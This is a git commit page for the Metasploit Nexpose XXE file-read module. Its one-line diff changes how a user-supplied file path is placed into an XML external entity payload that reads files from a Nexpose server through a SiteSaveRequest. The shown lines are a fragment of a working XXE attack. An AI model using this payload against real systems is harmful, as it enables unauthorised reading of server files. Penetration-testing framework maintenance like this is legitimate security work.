Fix nexpose_xxe_file_read datastore

bug/bundler_fix
William Vu 2015-02-05 01:41:35 -06:00
parent 5b2eb986c9
commit c22865fb71
No known key found for this signature in database
GPG Key ID: 68BD00CE25866743
1 changed files with 1 additions and 1 deletions

View File

@ -74,7 +74,7 @@ class Metasploit4 < Msf::Auxiliary
xml = '<!DOCTYPE foo ['
xml << '<!ELEMENT host ANY>'
xml << '<!ENTITY xxe SYSTEM "file://' << datastore['FILEPATH'] << '">'
xml << %Q{<!ENTITY xxe SYSTEM "file://#{datastore['FILEPATH']}">}
xml << ']>'
xml << '<SiteSaveRequest session-id="'